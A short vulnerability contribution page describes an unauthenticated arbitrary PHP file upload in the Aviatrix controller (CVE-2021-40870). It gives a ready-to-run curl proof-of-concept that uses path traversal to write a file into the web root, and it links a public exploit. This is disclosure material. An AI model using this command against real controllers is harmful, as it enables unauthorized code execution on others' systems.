Last Login: October 09, 2021
JoyGhoshs's Contributions (2)
This Vulnerability allows an attacker to create and store file on the Aviatrix controller. Exploitation phase doesn’t need any user authentication , or doesn’t require any other users interaction , simply can be exploited using curl . Here is one example.
curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo "Vulnerable Poc";?>' # after executing the previous command if the target is vulnerable this will create a php file on this path https://vulnerable.target.com/v1/poc
Attacker can do this unauthenticated because many API calls do not enforce a check for authentication. So this allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem .
Or You can Use This Exploit to do the exploition more easily : https://github.com/JoyGhoshs/CVE-2021-40870